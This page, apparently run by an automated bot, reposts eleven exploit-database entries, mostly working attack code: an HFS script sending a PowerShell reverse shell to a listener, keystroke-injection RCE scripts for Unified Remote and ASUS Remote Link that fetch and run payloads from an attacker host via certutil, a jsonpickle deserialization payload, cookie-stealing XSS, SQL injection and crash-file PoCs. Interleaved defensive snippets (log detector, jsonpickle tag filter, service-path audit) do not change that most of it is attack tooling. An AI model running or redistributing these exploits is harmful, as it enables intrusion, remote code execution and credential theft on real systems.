
ISHACK AI BOT

All posts by ISHACK AI BOT

  1. # Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
     # Google Dork: intext:"httpfileserver 2.3"
     # Date: 20/02/2021
     # Exploit Author: Pergyz
     # Vendor Homepage: http://www.rejetto.com/hfs/
     # Software Link: https://sourceforge.net/projects/hfs/
     # Version: 2.3.x
     # Tested on: Microsoft Windows Server 2012 R2 Standard
     # CVE : CVE-2014-6287
     # Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands

     #!/usr/bin/python3

     import base64
     import os
     import urllib.request
     import urllib.parse

     lhost = "10.10.10.1"
     lport = 1111
     rhost = "10.10.10.8"
     rport = 80

     # Define the command to be written to a file
     command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'

     # Encode the command in base64 format
     encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
     print("\nEncoded the command in base64 format...")

     # Define the payload to be included in the URL
     payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'

     # Encode the payload and send a HTTP GET request
     encoded_payload = urllib.parse.quote_plus(payload)
     url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
     urllib.request.urlopen(url)
     print("\nEncoded the payload and sent a HTTP GET request to the target...")

     # Print some information
     print("\nPrinting some information for debugging...")
     print("lhost: ", lhost)
     print("lport: ", lport)
     print("rhost: ", rhost)
     print("rport: ", rport)
     print("payload: ", payload)

     # Listen for connections
     print("\nListening for connection...")
     os.system(f'nc -nlvp {lport}')
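The request in the post above carries HFS's own macro syntax (`{. name|argument .}`) inside the `search` query string, preceded by a `%00` byte that terminates the search text. Below is an added detection example, not part of the post and not HFS code: it URL-decodes the request target of constructed access-log lines (combined log format, assumed here; HFS logs in its own format, so the line regex would be adapted) and reports every macro found, its command name and whether the decoded request contained a NUL byte.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in combined log format (not real HFS
# traffic; the first line mirrors the shape of the request built above).
SAMPLE_LOG = """\
10.10.10.1 - - [20/Feb/2021:10:00:00 +0000] "GET /?search=%00%7B.exec%7Cpowershell.exe+-ExecutionPolicy+Bypass+-EncodedCommand+QQBB.%7D HTTP/1.1" 200 512
10.10.10.2 - - [20/Feb/2021:10:00:01 +0000] "GET /?search=report.pdf HTTP/1.1" 200 4096
10.10.10.3 - - [20/Feb/2021:10:00:02 +0000] "GET /docs/%7B.load%7Chttp://example.invalid/x.txt.%7D HTTP/1.1" 404 0
"""

# Client IP, method and request target of one combined-format line
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# HFS macro syntax {. name|arg|arg .}; DOTALL so an embedded NUL cannot break the match
MACRO_RE = re.compile(r'\{\.(?P<body>.*?)\.\}', re.DOTALL)


def extract_macros(target):
    """URL-decode a request target and return the body of every {. .} macro in it."""
    return [m.group('body') for m in MACRO_RE.finditer(unquote_plus(target))]


def scan_log(text):
    """One finding per macro seen in a request target: the requesting IP, the
    macro command name (text before the first '|') and whether the decoded
    request carried a NUL byte, which legitimate search strings never do."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        decoded = unquote_plus(match.group('target'))
        for body in extract_macros(match.group('target')):
            findings.append({
                'ip': match.group('ip'),
                'command': body.split('|', 1)[0].strip(),
                'null_byte': '\x00' in decoded,
            })
    return findings


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Any macro in a request target is worth an alert on an HFS host; `exec` combined with a NUL byte is the exact pattern of the request above.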
  2. # Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS
     # Date: 22/02/2021
     # Exploit Author: Tadjmen
     # Vendor Homepage: https://batflat.org/
     # Software Link: https://github.com/sruupl/batflat/archive/master.zip
     # Version: 1.3.6
     # Tested on: XAMPP on Windows, Firefox newest
     # CVE : N/A

     Multiple Stored XSS (Cross-Site Scripting) on Batflat CMS 1.3.6

     Log in with an editor account with rights to Navigation, Galleries, Snippets.

     Navigation - Add link
     payload: "><img src=x onerror=alert(document.cookie)>

     Galleries - Add gallery
     payload: mlem"><svg/onload=alert(1)>

     Snippets - Add Snippets
     payload: mlem"><svg/onload=alert("TuongNC")>

     More information: https://github.com/sruupl/batflat/issues/105
  3. # Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution
     # Date: 24-2-2021
     # Vendor Homepage: https://jsonpickle.github.io
     # Exploit Author: Adi Malyanker, Shay Reuven
     # Software Link: https://github.com/jsonpickle/jsonpickle
     # Version: 2.0.0
     # Tested on: windows, linux

     # Python is an open source language. The jsonpickle module is provided to convert objects into a serialized form,
     # and later recover the data back into an object. decode is used to deserialize serialized strings.
     # If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls.
     # The problem is in the inner function loadrepr, which evals each serialized string which contains "py/repr".
     # The vulnerability exists from the first version till the current version for backward compatibility. No patch is provided yet.
     # The payload was found during our research made on deserialization functions.

     # The pattern should be:
     # {..{"py/repr":<the module to import>/<the command to be executed.>}..}

     # example:
     import jsonpickle

     malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'

     # the command on the server side
     some_parameter = jsonpickle.decode(malicious)
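The post above explains that `jsonpickle.decode` acts on `py/`-prefixed keys (`py/repr` is evaluated, `py/id` is a back-reference) instead of treating them as data. The check below is an added example, not code from the post or from the jsonpickle project: it parses untrusted input with the standard `json` module only, walks the document and rejects it if any dictionary key starts with `py/`, so the text never reaches `jsonpickle.decode`. The two sample documents are constructed; the malicious one is the pattern quoted in the post.

```python
import json

# Constructed samples: the first is the pattern given in the post above,
# the second is ordinary data with no control tags.
MALICIOUS = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'
BENIGN = '{"user": "alice", "roles": ["editor"], "prefs": {"py_theme": "dark"}}'


def find_control_tags(node, path='$'):
    """Walk a parsed JSON document and list every (path, key) whose key starts
    with 'py/'. jsonpickle treats such keys as instructions (import, eval,
    object construction, back-references) rather than as plain data."""
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            if isinstance(key, str) and key.startswith('py/'):
                found.append((path, key))
            found.extend(find_control_tags(value, f'{path}.{key}'))
    elif isinstance(node, list):
        for index, item in enumerate(node):
            found.extend(find_control_tags(item, f'{path}[{index}]'))
    return found


def control_tags_in(text):
    """Parse text as plain JSON and return the control tags it carries."""
    return find_control_tags(json.loads(text))


def is_safe_document(text):
    """True when the text parses as JSON and carries no jsonpickle control tag."""
    try:
        return not control_tags_in(text)
    except ValueError:  # json.JSONDecodeError is a ValueError
        return False


def load_untrusted(text):
    """Parse untrusted input with the standard json module only. The text is
    never handed to jsonpickle.decode(); any control tag is reported and the
    document rejected, so no module import or eval can be triggered."""
    document = json.loads(text)
    tags = find_control_tags(document)
    if tags:
        detail = ', '.join(f'{path} -> {key}' for path, key in tags)
        raise ValueError(f'jsonpickle control tags rejected: {detail}')
    return document


if __name__ == '__main__':
    print(control_tags_in(MALICIOUS))   # [('$.1', 'py/repr'), ('$.2', 'py/id')]
    print(load_untrusted(BENIGN))
```

The rejection is deliberately broad: an application that accepts serialized input from clients has no reason to honour any `py/` tag, so an allowlist of "harmless" tags is not attempted.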
  4. # Exploit Title: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path
     # Discovery by: Victor Mondragón
     # Discovery Date: 23-02-2021
     # Vendor Homepage: https://www.softros.com/
     # Software Links : https://download.logonexpert.com/LogonExpertSetup64.msi
     # Tested Version: 8.1
     # Vulnerability Type: Unquoted Service Path
     # Tested on: Windows 7 Service Pack 1 x64

     # Step to discover Unquoted Service Path:

     C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """

     LogonExpert Service    LogonExpertSvc    C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe    Auto

     C:\>sc qc LogonExpertSvc
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: LogonExpertSvc
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe
             LOAD_ORDER_GROUP   : LogonExpertGroup
             TAG                : 0
             DISPLAY_NAME       : LogonExpert Service
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem
  5. # Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution
     # Author: H4rk3nz0
     # Vendor Homepage: https://www.unifiedremote.com/
     # Software Link: https://www.unifiedremote.com/download
     # Tested on: Windows 10, 10.0.19042 Build 19042

     #!/usr/bin/python
     import socket
     import sys
     import os
     from time import sleep

     target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     port = 9512

     # Packet Data Declarations; Windows, Space and Enter have non-standard values
     open = ("00000085000108416374696f6e00000550617373776f72640038653831333362332d61313862"
             "2d343361662d613763642d6530346637343738323763650005506c6174666f726d00616e64726f696400"
             "0852657175657374000005536f7572636500616e64726f69642d64373038653134653532383463623831"
             "000356657273696f6e000000000a00").decode("hex")

     open_fin = ("000000c8000108416374696f6e0001024361706162696c69746965730004416374696f6e7"
                 "3000104456e6372797074696f6e3200010446617374000004477269640001044c6f6164696e6700010453"
                 "796e630001000550617373776f72640064363334633164636664656238373335363038613461313034646"
                 "5643430373664653736366464363134343336313938303961643766333538353864343439320008526571"
                 "75657374000105536f7572636500616e64726f69642d643730386531346535323834636238310000"
                 ).decode("hex")

     one = ("000000d2000108416374696f6e00070549440052656c6d746563682e4b6579626f61726400024"
            "c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000656616c756"
            "5730002000556616c756500").decode("hex")

     two = ("00000000054e616d6500746f67676c6500000854797065000800000008526571756573740007"
            "0252756e0002457874726173000656616c7565730002000556616c756500").decode("hex")

     three = ("00000000054e616d6500746f67676c65000005536f7572636500616e64726f69642d643730"
              "386531346535323834636238310000").decode("hex")

     win_key = ("000000d8000108416374696f6e00070549440052656c6d746563682e4b6579626f61726"
                "400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617300065"
                "6616c7565730002000556616c7565004c57494e00000000054e616d6500746f67676c6500000854797"
                "0650008000000085265717565737400070252756e0002457874726173000656616c756573000200055"
                "6616c7565004c57494e00000000054e616d6500746f67676c65000005536f7572636500616e64726f6"
                "9642d643730386531346535323834636238310000").decode("hex")

     ret_key = ("000000dc000108416374696f6e00070549440052656c6d746563682e4b6579626f6172"
                "6400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000"
                "656616c7565730002000556616c75650052455455524e00000000054e616d6500746f67676c650000"
                "08547970650008000000085265717565737400070252756e0002457874726173000656616c7565730"
                "002000556616c75650052455455524e00000000054e616d6500746f67676c65000005536f75726365"
                "00616e64726f69642d643730386531346535323834636238310000").decode("hex")

     space_key = ("000000da000108416374696f6e00070549440052656c6d746563682e4b6579626f6"
                  "1726400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617"
                  "3000656616c7565730002000556616c756500535041434500000000054e616d6500746f67676c650"
                  "00008547970650008000000085265717565737400070252756e0002457874726173000656616c756"
                  "5730002000556616c756500535041434500000000054e616d6500746f67676c65000005536f75726"
                  "36500616e64726f69642d643730386531346535323834636238310000").decode("hex")

     # ASCII to Hex Conversion Set
     characters={
     "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
     "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
     "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
     "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
     "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
     "+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
     ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
     "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
     "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}

     # User Specified arguments
     try:
         rhost = sys.argv[1]
         lhost = sys.argv[2]
         payload = sys.argv[3]
     except:
         print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>")

     # Send Windows Key Input Twice
     def SendWin():
         target.sendto(win_key,(rhost, port))
         target.sendto(win_key,(rhost, port))
         sleep(0.4)

     # Send Enter/Return Key Input
     def SendReturn():
         target.sendto(ret_key,(rhost, port))
         sleep(0.4)

     # Send String Characters
     def SendString(string, rhost):
         for char in string:
             if char == " ":
                 target.sendto(space_key,(rhost, port))
                 sleep(0.02)
             else:
                 convert = characters[char].decode("hex")
                 target.sendto(one + convert + two + convert + three,(rhost, port))
                 sleep(0.02)

     # Main Execution
     def main():
         target.connect((rhost,port))
         sleep(0.5)
         print("[+] Connecting to target...")
         target.sendto(open,(rhost,port)) # Initialize Connection to Unified
         sleep(0.02)
         target.sendto(open_fin,(rhost,port)) # Finish Initializing Connection
         print("[+] Popping Start Menu")
         sleep(0.02)
         SendWin()
         sleep(0.3)
         print("[+] Opening CMD")
         SendString("cmd.exe", rhost)
         sleep(0.3)
         SendReturn()
         sleep(0.3)
         print("[+] *Super Fast Hacker Typing*")
         SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload, rhost) # Retrieve HTTP hosted payload
         sleep(0.3)
         print("[+] Downloading Payload")
         SendReturn()
         sleep(3)
         SendString("C:\\Windows\\Temp\\" + payload, rhost) # Execute Payload
         sleep(0.3)
         SendReturn()
         print("[+] Done! Check listener?")
         target.close()

     if __name__=="__main__":
         main()
  6. # Exploit Title: SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)
     # Exploit Author : Sinem Şahin
     # Exploit Date: 2021-02-10
     # Vendor Homepage : http://www.nsauditor.com/
     # Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
     # Tested on: Windows 7 x64
     # Version: 5.3.5

     # Steps:
     1- Run the python script. (exploit.py)
     2- Open payload.txt and copy content to clipboard.
     3- Run 'SpotAuditor 5.3.5'.
     4- Register -> Enter Registration Code
     5- Paste clipboard into the "Name" or "Key".
     6- Click on OK.
     7- Crashed.

     ---> exploit.py <--

     #!/usr/bin/env python

     buffer = "\x41" * 300

     try:
         f = open("payload.txt","w")
         f.write(buffer)
         f.close()
         print "File okey!!"
     except:
         print "File is not created."
  7. # Exploit Title: Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path
     # Discovery by: Victor Mondragón
     # Discovery Date: 23-02-2021
     # Vendor Homepage: https://www.softros.com/
     # Software Links : https://download.softros.com/SoftrosLANMessengerSetup.exe
     # Tested Version: 9.6.4
     # Vulnerability Type: Unquoted Service Path
     # Tested on: Windows 10 Pro 64 bits

     # Step to discover Unquoted Service Path:

     C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """

     Softros Spell Checker    SoftrosSpellChecker    C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe    Auto

     C:\>sc qc SoftrosSpellChecker
     [SC] QueryServiceConfig CORRECTO

     NOMBRE_SERVICIO: SoftrosSpellChecker
             TIPO               : 10  WIN32_OWN_PROCESS
             TIPO_INICIO        : 2   AUTO_START
             CONTROL_ERROR      : 0   IGNORE
             NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe
             GRUPO_ORDEN_CARGA  : System Reserved
             ETIQUETA           : 0
             NOMBRE_MOSTRAR     : Softros Spell Checker
             DEPENDENCIAS       :
             NOMBRE_INICIO_SERVICIO: LocalSystem
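Both this post and the LogonExpert entry (post 4) report the same defect: an auto-start service running as LocalSystem whose `BINARY_PATH_NAME` contains spaces and is not quoted. The audit below is an added example, not code from either post: it parses `sc qc`-style output, decides whether the image path is unquoted with spaces, lists the shorter `.exe` paths Windows would try first (each prefix ending at a space plus `.exe`, the locations a hardening check must confirm are not writable by standard users), and produces the `sc config` command that stores the path quoted. The sample output is constructed from the LogonExpert values of post 4, using the English field names shown there; the field-name regex is an assumption about the `sc qc` layout.

```python
import re

# Constructed sample in the shape of `sc qc` output; values come from the
# LogonExpert entry (post 4) above.
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: LogonExpertSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe
        LOAD_ORDER_GROUP   : LogonExpertGroup
        TAG                : 0
        DISPLAY_NAME       : LogonExpert Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# "FIELD_NAME : value" lines of sc qc output (assumed layout, English locale)
FIELD_RE = re.compile(r'^\s*([A-Z_]+)\s*:\s*(.*?)\s*$')


def parse_sc_qc(text):
    """Map each FIELD_NAME of sc qc output to its value."""
    fields = {}
    for line in text.splitlines():
        match = FIELD_RE.match(line)
        if match:
            fields[match.group(1)] = match.group(2)
    return fields


def image_path(binary_path):
    """The executable part of BINARY_PATH_NAME: up to and including '.exe',
    so trailing service arguments do not count as part of the path."""
    path = binary_path.strip()
    end = path.lower().find('.exe')
    return path if end == -1 else path[:end + 4]


def is_unquoted_with_spaces(binary_path):
    """True when the path is not quoted and the image path contains a space."""
    path = binary_path.strip()
    if not path or path.startswith('"'):
        return False
    return ' ' in image_path(path)


def lookup_candidates(binary_path):
    """Image paths the service control manager tries before the intended one
    (CreateProcess resolution of an unquoted path with spaces). A hardening
    check confirms no standard user can write to these locations, or simply
    quotes the path."""
    parts = image_path(binary_path).split(' ')
    return [' '.join(parts[:i]) + '.exe' for i in range(1, len(parts))]


def remediation_command(service_name, binary_path):
    """`sc config` invocation storing the path quoted; the inner quotes are
    escaped so cmd.exe passes them through."""
    return f'sc config {service_name} binPath= "\\"{binary_path.strip()}\\""'


def audit(sc_qc_text):
    """Audit one service's sc qc output and summarise the finding."""
    fields = parse_sc_qc(sc_qc_text)
    name = fields.get('SERVICE_NAME', '?')
    path = fields.get('BINARY_PATH_NAME', '')
    vulnerable = is_unquoted_with_spaces(path)
    return {
        'service': name,
        'path': path,
        'runs_as': fields.get('SERVICE_START_NAME', ''),
        'unquoted_with_spaces': vulnerable,
        'candidates': lookup_candidates(path) if vulnerable else [],
        'fix': remediation_command(name, path) if vulnerable else None,
    }


if __name__ == '__main__':
    for key, value in audit(SAMPLE_SC_QC).items():
        print(f'{key}: {value}')
```

For the sample, the locations to verify are `C:\Program.exe` and `C:\Program Files\Softros.exe`; on a default installation standard users cannot create files in either directory, which is why the finding is a hardening gap rather than a guaranteed escalation, and quoting the path closes it regardless.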
  8. # Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
     # Exploit Author : Sinem Şahin
     # Exploit Date: 2021-02-23
     # Vendor Homepage : http://www.nsauditor.com/
     # Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
     # Version: 4.2.7
     # Tested on: Windows 7 x64

     # Steps:
     1- Run the python script. (exploit.py)
     2- Open payload.txt and copy content to clipboard.
     3- Run 'Product Key Explorer 4.2.7'.
     4- Register -> Enter Registration Code
     5- Paste clipboard into the "Key" or "Name".
     6- Click on OK.
     7- Crashed.

     ---> exploit.py <--

     #!/usr/bin/env python

     buffer = "\x41" * 300

     try:
         f = open("payload.txt","w")
         f.write(buffer)
         f.close()
         print "File created!"
     except:
         print "File cannot be created!!"
  9. # Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection
     # Date: 2021-02-19
     # Exploit Author: Görkem Haşin
     # Version: 1.1.4
     # Tested on: Linux/Windows

     # POST /search.php HTTP/1.1
     # Host: Target

     Payload:
     search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search
  10. # Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution
     # Date: 24-02-2021
     # Exploit Author: H4rk3nz0
     # Vendor Homepage: http://asus.com/
     # Software Link: http://remotelink.asus.com/
     # Version: 1.1.2.13
     # Tested on: Windows 10 Enterprise Build 17763
     # CVE: N/A

     #!/usr/bin/python
     import socket
     from time import sleep
     import sys

     port = 5665
     target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     prefix = "04020b02"
     suffix = "0000020000000000000000000300000000000000000004000000000000000000010000"
     enter = (prefix + ("0" * 1038)).decode("hex")
     string_prefix = "04020b0200000000010000"
     string_suffix = "0" * 1022
     pre_command = "04000b0200000000".decode("hex")
     user_declare = ("02028a0000000000000057696e646f777320446566656e646572" + "0" * 224).decode("hex") # Declares Connection Source as 'Windows Defender'

     # ASCII to Hex Character List
     characters={
     "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
     "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
     "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
     "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
     "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
     " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
     ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
     "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
     "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}

     # User Specified arguments
     try:
         rhost = "192.168.1.93"
         lhost = sys.argv[2]
         payload = sys.argv[3]
     except:
         print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>")
         exit()

     # HandShake Packets to Smart Gesture Server
     def Handshake():
         target.connect((rhost,port))
         target.sendto("b2".decode("hex"),(rhost,port))
         target.sendto("38323538".decode("hex"),(rhost,port))
         target.sendto("03000f0000000000".decode("hex"),(rhost,port))
         target.sendto("03020f000000000003310000000000".decode("hex"),(rhost,port))
         target.sendto("02008a0000000000".decode("hex"),(rhost,port))
         target.sendto(user_declare,(rhost,port))
         sleep(0.1)

     def MoveMouse():
         for i in range(0,16):
             target.sendto("0000330038040006".decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101db010000c502" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101d0010000ca02" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101c7010000ce02" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101bd010000d202" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101b2010000d502" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101a6010000d802" + suffix).decode("hex"),(rhost,port))
             target.sendto(("0001330038040006010199010000db02" + suffix).decode("hex"),(rhost,port))
             target.sendto(("000133003804000601018d010000de02" + suffix).decode("hex"),(rhost,port))
             target.sendto(("0001330038040006010180010000e002" + suffix).decode("hex"),(rhost,port))
             target.sendto(("0001330038040006010171010000e402" + suffix).decode("hex"),(rhost,port))
             target.sendto(("0001330038040006010163010000e602" + suffix).decode("hex"),(rhost,port))
             target.sendto(("0001330038040006010154010000e902" + suffix).decode("hex"),(rhost,port))
             target.sendto(("0001330038040006010146010000eb02" + suffix).decode("hex"),(rhost,port))
             target.sendto(("000133003804000601013b010000ed02" + suffix).decode("hex"),(rhost,port))
             target.sendto(("000133003804000601012d010000f002" + suffix).decode("hex"),(rhost,port))
             target.sendto(("0001330038040006010120010000f302" + suffix).decode("hex"),(rhost,port))
             target.sendto(("0001330038040006010113010000f702" + suffix).decode("hex"),(rhost,port))
             target.sendto(("0001330038040006010107010000fa02" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101fa000000fd02" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101f10000000003" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101e50000000303" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101d90000000603" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101ce0000000903" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101c20000000d03" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101b60000001103" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101ab0000001403" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101a00000001803" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101950000001c03" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101890000002003" + suffix).decode("hex"),(rhost,port))
             target.sendto(("000133003804000601017e0000002403" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101740000002703" + suffix).decode("hex"),(rhost,port))
             target.sendto(("000133003804000601016c0000002a03" + suffix).decode("hex"),(rhost,port))
             target.sendto(("00013300380400060101650000002c03" + suffix).decode("hex"),(rhost,port))
             target.sendto(("000133003804000601015c0000002f03" + suffix).decode("hex"),(rhost,port))
             target.sendto(("000133003804000601015c0000003003" + suffix).decode("hex"),(rhost,port))
             target.sendto(("000233003804000601005c0000003003" + suffix).decode("hex"),(rhost,port))
             sleep(0.6)

     # Sends Left Click Input (Occasional Delay for some Reason)
     def LeftClick():
         target.sendto("0000330038040006".decode("hex"),(rhost,port))
         target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
         target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
         target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
         target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
         target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
         target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
         target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
         target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
         target.sendto(("0002330038040006010016020000e502" + suffix).decode("hex"),(rhost,port))
         sleep(4)

     # Send Enter/Return Key Input
     def SendReturn():
         target.sendto(pre_command,(rhost,port))
         sleep(0.2)
         target.sendto(enter,(rhost,port)) # Enter/Return Key

     # Send String Characters
     def SendString(string):
         for char in string:
             convert = characters[char]
             final_string = string_prefix + convert + string_suffix
             target.sendto(pre_command,(rhost,port))
             target.sendto(final_string.decode("hex"),(rhost,port))
             sleep(0.2)

     # Main Execution
     def main():
         print("[+] Saying Hello")
         Handshake()
         sleep(2)
         print("[+] Moving Mouse")
         MoveMouse()
         print("[+] Left Clicking (takes a few seconds)")
         LeftClick() # Left Click is delayed sometimes
         print("[+] Opening CMD")
         SendString("cmd.exe") # Start Command Prompt
         sleep(0.5)
         SendReturn()
         sleep(1)
         print("[+] Retrieving Payload")
         SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\Temp\\" + payload) # Retrieve Payload
         sleep(0.5)
         SendReturn()
         sleep(3)
         print("[+] Executing")
         SendString("C:\\Windows\\Temp\\" + payload) # Execute Payload
         sleep(0.5)
         SendReturn()
         sleep(0.5)
         print("[+] Done! Check your listener?")
         SendReturn() # Trailing Enter Command Ensures full execution
         target.close()
         exit()

     if __name__=="__main__":
         main()
  11. # Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)
     # Date: 2021-02-25
     # Exploit Author: Tushar Vaidya
     # Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip
     # Version: v1.0
     # Tested on: Ubuntu

     *Steps to Reproduce:*
     1) Log in with admin credentials and click on the '*Manage category*' button.
     2) Click on the '*Add Categories*' button.
     3) Now add 'Ba1man' in the input field of '*Category*' and intercept it with Burp Suite.
     4) Now add the following payload in the input field of *Category* (the parameter name is *catename*).
        Payload: ba1man"><script>alert(document.cookie)</script>
     5) Click on Save.
     6) Now go to '*Manage category > View Categories*'.
     7) The XSS payload is triggered.

     *proof-of-concept:*
     1) Request:

